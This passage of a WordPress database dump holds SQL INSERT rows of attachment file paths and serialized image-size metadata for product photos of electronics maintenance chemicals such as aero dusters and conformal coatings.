INSERT INTO `wp_postmeta` VALUES (14753, 1393, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:31:"2016/09/ms-222l-aero-duster.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"ms-222l-aero-duster-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"ms-222l-aero-duster-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14754, 1394, '_wp_attached_file', '2016/09/ms-222n-aero-duster.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14755, 1394, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:31:"2016/09/ms-222n-aero-duster.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"ms-222n-aero-duster-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"ms-222n-aero-duster-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14756, 1395, '_wp_attached_file', '2016/09/ms-242l-quik-freeze.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14757, 1395, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:31:"2016/09/ms-242l-quik-freeze.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"ms-242l-quik-freeze-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"ms-242l-quik-freeze-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14758, 1396, '_wp_attached_file', '2016/09/ms-255-surface-prep-clean.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14759, 1396, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:37:"2016/09/ms-255-surface-prep-clean.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"ms-255-surface-prep-clean-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"ms-255-surface-prep-clean-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14760, 1397, '_wp_attached_file', '2016/09/ms-260-plastic-glass-metal-cleaner.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14761, 1397, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-260-plastic-glass-metal-cleaner.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-260-plastic-glass-metal-cleaner-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-260-plastic-glass-metal-cleaner-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14762, 1398, '_wp_attached_file', '2016/09/ms-280-ipa-clean.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14763, 1398, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:28:"2016/09/ms-280-ipa-clean.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"ms-280-ipa-clean-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"ms-280-ipa-clean-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14764, 1399, '_wp_attached_file', '2016/09/ms-381h-connector-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14765, 1399, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-381h-connector-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-381h-connector-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-381h-connector-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14766, 1400, '_wp_attached_file', '2016/09/ms-452n-protective-varnish.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14767, 1400, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:38:"2016/09/ms-452n-protective-varnish.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"ms-452n-protective-varnish-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"ms-452n-protective-varnish-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14768, 1401, '_wp_attached_file', '2016/09/ms-460h-silicone-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14769, 1401, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-460h-silicone-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-460h-silicone-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-460h-silicone-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14770, 1402, '_wp_attached_file', '2016/09/ms-462h-silicone-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14771, 1402, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-462h-silicone-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-462h-silicone-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-462h-silicone-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14772, 1403, '_wp_attached_file', '2016/09/ms-465c-acrylic-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14773, 1403, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:45:"2016/09/ms-465c-acrylic-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"ms-465c-acrylic-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"ms-465c-acrylic-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14774, 1404, '_wp_attached_file', '2016/09/ms-467c-acrylic-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14775, 1404, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:45:"2016/09/ms-467c-acrylic-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"ms-467c-acrylic-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"ms-467c-acrylic-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14776, 1405, '_wp_attached_file', '2016/09/ms-470c-urethane-conformal-coating.jpg'); 
